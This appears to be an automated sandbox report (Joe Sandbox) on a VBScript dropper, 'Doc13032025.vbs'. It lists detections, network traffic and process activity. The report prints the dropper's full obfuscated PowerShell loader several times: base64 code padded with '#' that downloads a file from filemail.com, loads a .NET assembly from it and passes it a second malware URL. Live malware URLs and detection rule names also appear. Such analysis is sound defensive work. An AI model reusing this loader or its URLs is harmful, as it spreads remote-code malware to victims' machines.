BH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bx#HU#YQBk#HI#aQBu#HY#YQBy#Gk#YQBu#HQ#L##n#Cc#L##n#Cc#L##n#Cc#L##n#GE#cwBw#G4#ZQB0#F8#YwBv#G0#c#Bp#Gw#ZQBy#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Gg#d#B0#H##Og#v#C8#bQBv#HI#ZQBk#G8#dQBs#C4#eQBk#G4#cw#u#GU#dQ#v#HM#bwB1#Gw#LwBt#Gk#bgBk#C4#d#B4#HQ#Jw#s#Cc#Qw#6#Fw#U#By#G8#ZwBy#GE#bQBE#GE#d#Bh#Fw#Jw#s#Cc#ZgBl#HI#cgBp#GM#eQBh#G4#a#B5#GQ#cgBp#GM#Jw#s#Cc#dgBi#HM#Jw#s#Cc#MQ#n#Cw#Jw#x#Cc#L##n#
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://1019.filemail.com/api/file/get?filekey=ZrKTNo-_DMWgm0oonSr97JAkdrUqbICVeG2LmuclzuON2ZavKqsQg0NqChSLT4A&pk_vid=342803d1cc4e3b801741606974b78eb1Avira URL Cloud: Label: malware
        Source: http://moredoul.ydns.eu/soul/mind.txtAvira URL Cloud: Label: malware
        Source: http://moredoul.ydns.eu/soul/mind.txtXAvira URL Cloud: Label: malware
        Source: Doc13032025.vbsVirustotal: Detection: 22%Perma Link
        Source: Doc13032025.vbsReversingLabs: Detection: 21%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
        Source: unknownHTTPS traffic detected: 142.215.209.80:443 -> 192.168.2.5:49710 version: TLS 1.2
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1390483855.0000025C7ED73000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1390483855.0000025C7EE2E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1390483855.0000025C7EE2E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1390483855.0000025C7EE2E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000001.00000002.1390483855.0000025C7EE2E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: pdbpdblib.pdb` source: powershell.exe, 00000001.00000002.1390483855.0000025C7ED73000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 089\System.Core.pdb source: powershell.exe, 00000001.00000002.1391644987.0000025C7F050000.00000004.00000020.00020000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=ZrKTNo-_DMWgm0oonSr97JAkdrUqbICVeG2LmuclzuON2ZavKqsQg0NqChSLT4A&pk_vid=342803d1cc4e3b801741606974b78eb1 HTTP/1.1Host: 1019.filemail.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 142.215.209.80 142.215.209.80
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=ZrKTNo-_DMWgm0oonSr97JAkdrUqbICVeG2LmuclzuON2ZavKqsQg0NqChSLT4A&pk_vid=342803d1cc4e3b801741606974b78eb1 HTTP/1.1Host: 1019.filemail.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: 1019.filemail.com
        Source: powershell.exe, 00000001.00000002.1365582388.0000025C68477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1019.filemail.com
        Source: powershell.exe, 00000001.00000002.1391644987.0000025C7F070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
        Source: powershell.exe, 00000001.00000002.1365582388.0000025C68477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip.1019.filemail.com
        Source: powershell.exe, 00000001.00000002.1365582388.0000025C66F4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://moredoul.ydns.eu/soul/mind.txt
        Source: powershell.exe, 00000001.00000002.1365582388.0000025C6834F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://moredoul.ydns.eu/soul/mind.txtX
        Source: powershell.exe, 00000001.00000002.1387174750.0000025C76D98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1387174750.0000025C76EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000001.00000002.1365582388.0000025C66F4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000001.00000002.1365582388.0000025C66D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000001.00000002.1365582388.0000025C66F4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000001.00000002.1365582388.0000025C6834F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1365582388.0000025C68471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1019.filemail.com
        Source: powershell.exe, 00000001.00000002.1365582388.0000025C66F4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1019.filemail.com/api/file/get?filekey=ZrKTNo-_DMWgm0oon
        Source: powershell.exe, 00000001.00000002.1365582388.0000025C6834F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1365582388.0000025C66F4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1019.filemail.com/api/file/get?filekey=ZrKTNo-_DMWgm0oonSr97JAkdrUqbICVeG2LmuclzuON2ZavKqsQg
        Source: powershell.exe, 00000001.00000002.1365582388.0000025C66D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000001.00000002.1387174750.0000025C76EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000001.00000002.1387174750.0000025C76EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000001.00000002.1387174750.0000025C76EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000001.00000002.1365582388.0000025C66F4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: wscript.exe, 00000000.00000003.1297067424.0000012C098D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296117579.0000012C097D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296576153.0000012C07877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1295113223.0000012C0781E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1297459594.0000012C07877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1292693133.0000012C097B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296444130.0000012C0982A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1292576276.0000012C09759000.00000004.00000020.00020000.00000000.sdmp, Doc13032025.vbsString found in binary or memory: https://github.com/koswald/VBScript
        Source: wscript.exe, 00000000.00000003.1297067424.0000012C098D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296117579.0000012C097D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1295113223.0000012C0781E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1292921213.0000012C096D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296444130.0000012C0982A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1292832290.0000012C096D1000.00000004.00000020.00020000.00000000.sdmp, Doc13032025.vbsString found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
        Source: wscript.exe, 00000000.00000003.1292480959.0000012C096FE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297067424.0000012C098D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296117579.0000012C097D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1295113223.0000012C0781E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296444130.0000012C0982A000.00000004.00000020.00020000.00000000.sdmp, Doc13032025.vbsString found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
        Source: powershell.exe, 00000001.00000002.1365582388.0000025C6794F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000001.00000002.1387174750.0000025C76D98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1387174750.0000025C76EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownHTTPS traffic detected: 142.215.209.80:443 -> 192.168.2.5:49710 version: TLS 1.2

        System Summary

        barindex
        Source: Process Memory Space: powershell.exe PID: 8432, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Initial file: Dim cmd 'string: ShellExecute arg #1
        Source: Initial file: Dim args 'string: ShellExecute arg #2
        Source: Initial file: Dim pwd 'string: ShellExecute arg #3
        Source: Initial file: Dim privileges 'string: ShellExecute arg #4
        Source: Initial file: .ShellExecute cmd, args, pwd, privileges
        Source: Initial file: Dim cmd 'string: ShellExecute arg #1
        Source: Initial file: 'Class scope: args_ 'string: ShellExecute arg #2
        Source: Initial file: Dim pwd 'string: ShellExecute arg #3
        Source: Initial file: Dim privileges 'string: ShellExecute arg #4
        Source: Initial file: .ShellExecute cmd, args_, pwd, privileges
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bm#Gw#dQB4#Gk#bwBu#GE#b#Bp#HQ#eQ#g#D0#I##n#HQ#e#B0#C4#Z#Bu#Gk#bQ#v#Gw#dQBv#HM#LwB1#GU#LgBz#G4#Z#B5#C4#b#B1#G8#Z#Bl#HI#bwBt#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#cQB1#GE#Z#By#Gk#bgB2#GE#cgBp#GE#bgB0#C##PQ#g#CQ#ZgBs#HU#e#Bp#G8#bgBh#Gw#aQB0#Hk#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#YQBp#HI#aQBu#Gc#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#MQ#w#DE#OQ#u#GY#aQBs#GU#bQBh#Gk#b##u#GM#bwBt#C8#YQBw#Gk#LwBm#Gk#b#Bl#C8#ZwBl#HQ#PwBm#Gk#b#Bl#Gs#ZQB5#D0#WgBy#Es#V#BO#G8#LQBf#EQ#TQBX#Gc#bQ#w#G8#bwBu#FM#cg#5#Dc#SgBB#Gs#Z#By#FU#cQBi#Ek#QwBW#GU#Rw#y#Ew#bQB1#GM#b#B6#HU#TwBO#DI#WgBh#HY#SwBx#HM#UQBn#D##TgBx#EM#a#BT#Ew#V##0#EE#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#MQ#2#D##Ng#5#Dc#N#Bi#Dc#O#Bl#GI#MQ#n#Ds#J#Bs#G8#awBv#HI#eQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#FM#YQBs#GU#cwBp#GE#bgBz#C##PQ#g#CQ#b#Bv#Gs#bwBy#Hk#cw#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#GE#aQBy#Gk#bgBn#Ck#Ow#k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#UwBh#Gw#ZQBz#Gk#YQBu#HM#KQ#7#CQ#bQBl#HM#a#Bl#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#HU#bgBk#GU#cgBj#Gw#dQBi#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#I##9#C##J#Bk#Hk#bgBh#G0#bwBn#GU#bg#u#Ek#bgBk#GU#e#BP#GY#K##k#G0#ZQBz#Gg#ZQBz#Ck#Ow#k#GY#cgBp#HM#awBl#HQ#cw#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#dQBu#GQ#ZQBy#GM#b#B1#GI#KQ#7#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GY#cgBp#HM#awBl#HQ#cw#g#C0#ZwB0#C##J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#Ds#J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#C##Kw#9#C##J#Bt#GU#cwBo#GU#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bz#HU#c#Bl#HI#dgBp#HI#aQBs#Gk#d#B5#C##PQ#g#CQ#ZgBy#Gk#cwBr#GU#d#Bz#C##LQ#g#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#7#CQ#b#Bp#G8#Z#Bl#HI#YQ#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#L##g#CQ#cwB1#H##ZQBy#HY#aQBy#Gk#b#Bp#HQ#eQ#p#Ds#J#Bt#GE#cgBh#GI#bwB1#HQ#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bs#Gk#bwBk#GU#cgBh#Ck#Ow#k#GM#bwBu#HQ#cgBp#HQ#aQBv#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#bQBh#HI#YQBi#G8#dQB0#HM#KQ#7#CQ#YwBv#Gw#c#Bv#HI#cgBo#GU#e#Bp#HM#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bx#HU#YQBk#HI#aQBu#HY#YQBy#Gk#YQBu#HQ#L##n#Cc#L##n#Cc#L##n#Cc#L##n#GE#cwBw#G4#ZQB0#F8#YwBv#G0#c#Bp#Gw#ZQBy#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Gg#d#B0#H##Og#v#C8#bQBv#HI#ZQBk#G8#dQBs#C4#eQBk#G4#cw#u#GU#dQ#v#HM#bwB1#Gw#LwBt#Gk#bgBk#C4#d#B4#HQ#Jw#s#Cc#Qw#6#Fw#U#By#G8#ZwBy#GE#bQBE#GE#d#Bh#Fw#Jw#s#Cc#ZgBl#HI#cgBp#GM#eQBh#G4#a#B5#GQ#cgBp#GM#Jw
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bm#Gw#dQB4#Gk#bwBu#GE#b#Bp#HQ#eQ#g#D0#I##n#HQ#e#B0#C4#Z#Bu#Gk#bQ#v#Gw#dQBv#HM#LwB1#GU#LgBz#G4#Z#B5#C4#b#B1#G8#Z#Bl#HI#bwBt#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#cQB1#GE#Z#By#Gk#bgB2#GE#cgBp#GE#bgB0#C##PQ#g#CQ#ZgBs#HU#e#Bp#G8#bgBh#Gw#aQB0#Hk#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#YQBp#HI#aQBu#Gc#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#MQ#w#DE#OQ#u#GY#aQBs#GU#bQBh#Gk#b##u#GM#bwBt#C8#YQBw#Gk#LwBm#Gk#b#Bl#C8#ZwBl#HQ#PwBm#Gk#b#Bl#Gs#ZQB5#D0#WgBy#Es#V#BO#G8#LQBf#EQ#TQBX#Gc#bQ#w#G8#bwBu#FM#cg#5#Dc#SgBB#Gs#Z#By#FU#cQBi#Ek#QwBW#GU#Rw#y#Ew#bQB1#GM#b#B6#HU#TwBO#DI#WgBh#HY#SwBx#HM#UQBn#D##TgBx#EM#a#BT#Ew#V##0#EE#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#MQ#2#D##Ng#5#Dc#N#Bi#Dc#O#Bl#GI#MQ#n#Ds#J#Bs#G8#awBv#HI#eQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#FM#YQBs#GU#cwBp#GE#bgBz#C##PQ#g#CQ#b#Bv#Gs#bwBy#Hk#cw#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#GE#aQBy#Gk#bgBn#Ck#Ow#k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#UwBh#Gw#ZQBz#Gk#YQBu#HM#KQ#7#CQ#bQBl#HM#a#Bl#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#HU#bgBk#GU#cgBj#Gw#dQBi#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#I##9#C##J#Bk#Hk#bgBh#G0#bwBn#GU#bg#u#Ek#bgBk#GU#e#BP#GY#K##k#G0#ZQBz#Gg#ZQBz#Ck#Ow#k#GY#cgBp#HM#awBl#HQ#cw#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#dQBu#GQ#ZQBy#GM#b#B1#GI#KQ#7#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GY#cgBp#HM#awBl#HQ#cw#g#C0#ZwB0#C##J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#Ds#J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#C##Kw#9#C##J#Bt#GU#cwBo#GU#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bz#HU#c#Bl#HI#dgBp#HI#aQBs#Gk#d#B5#C##PQ#g#CQ#ZgBy#Gk#cwBr#GU#d#Bz#C##LQ#g#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#7#CQ#b#Bp#G8#Z#Bl#HI#YQ#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#L##g#CQ#cwB1#H##ZQBy#HY#aQBy#Gk#b#Bp#HQ#eQ#p#Ds#J#Bt#GE#cgBh#GI#bwB1#HQ#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bs#Gk#bwBk#GU#cgBh#Ck#Ow#k#GM#bwBu#HQ#cgBp#HQ#aQBv#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#bQBh#HI#YQBi#G8#dQB0#HM#KQ#7#CQ#YwBv#Gw#c#Bv#HI#cgBo#GU#e#Bp#HM#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bx#HU#YQBk#HI#aQBu#HY#YQBy#Gk#YQBu#HQ#L##n#Cc#L##n#Cc#L##n#Cc#L##n#GE#cwBw#G4#ZQB0#F8#YwBv#G0#c#Bp#Gw#ZQBy#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Gg#d#B0#H##Og#v#C8#bQBv#HI#ZQBk#G8#dQBs#C4#eQBk#G4#cw#u#GU#dQ#v#HM#bwB1#Gw#LwBt#Gk#bgBk#C4#d#B4#HQ#Jw#s#Cc#Qw#6#Fw#U#By#G8#ZwBy#GE#bQBE#GE#d#Bh#Fw#Jw#s#Cc#ZgBl#HI#cgBp#GM#eQBh#G4#a#B5#GQ#cgBp#GM#JwJump to behavior
        Source: Doc13032025.vbsInitial sample: Strings found which are bigger than 50
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3173
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3173Jump to behavior
        Source: Process Memory Space: powershell.exe PID: 8432, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.expl.evad.winVBS@4/3@1/1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8440:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n3iu1fd3.qtp.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc13032025.vbs"
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Doc13032025.vbsVirustotal: Detection: 22%
        Source: Doc13032025.vbsReversingLabs: Detection: 21%
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc13032025.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bm#Gw#dQB4#Gk#bwBu#GE#b#Bp#HQ#eQ#g#D0#I##n#HQ#e#B0#C4#Z#Bu#Gk#bQ#v#Gw#dQBv#HM#LwB1#GU#LgBz#G4#Z#B5#C4#b#B1#G8#Z#Bl#HI#bwBt#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#cQB1#GE#Z#By#Gk#bgB2#GE#cgBp#GE#bgB0#C##PQ#g#CQ#ZgBs#HU#e#Bp#G8#bgBh#Gw#aQB0#Hk#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#YQBp#HI#aQBu#Gc#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#MQ#w#DE#OQ#u#GY#aQBs#GU#bQBh#Gk#b##u#GM#bwBt#C8#YQBw#Gk#LwBm#Gk#b#Bl#C8#ZwBl#HQ#PwBm#Gk#b#Bl#Gs#ZQB5#D0#WgBy#Es#V#BO#G8#LQBf#EQ#TQBX#Gc#bQ#w#G8#bwBu#FM#cg#5#Dc#SgBB#Gs#Z#By#FU#cQBi#Ek#QwBW#GU#Rw#y#Ew#bQB1#GM#b#B6#HU#TwBO#DI#WgBh#HY#SwBx#HM#UQBn#D##TgBx#EM#a#BT#Ew#V##0#EE#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#MQ#2#D##Ng#5#Dc#N#Bi#Dc#O#Bl#GI#MQ#n#Ds#J#Bs#G8#awBv#HI#eQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#FM#YQBs#GU#cwBp#GE#bgBz#C##PQ#g#CQ#b#Bv#Gs#bwBy#Hk#cw#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#GE#aQBy#Gk#bgBn#Ck#Ow#k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#UwBh#Gw#ZQBz#Gk#YQBu#HM#KQ#7#CQ#bQBl#HM#a#Bl#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#HU#bgBk#GU#cgBj#Gw#dQBi#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#I##9#C##J#Bk#Hk#bgBh#G0#bwBn#GU#bg#u#Ek#bgBk#GU#e#BP#GY#K##k#G0#ZQBz#Gg#ZQBz#Ck#Ow#k#GY#cgBp#HM#awBl#HQ#cw#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#dQBu#GQ#ZQBy#GM#b#B1#GI#KQ#7#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GY#cgBp#HM#awBl#HQ#cw#g#C0#ZwB0#C##J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#Ds#J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#C##Kw#9#C##J#Bt#GU#cwBo#GU#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bz#HU#c#Bl#HI#dgBp#HI#aQBs#Gk#d#B5#C##PQ#g#CQ#ZgBy#Gk#cwBr#GU#d#Bz#C##LQ#g#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#7#CQ#b#Bp#G8#Z#Bl#HI#YQ#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#UwB1#GI#cwB0#HI#aQBu#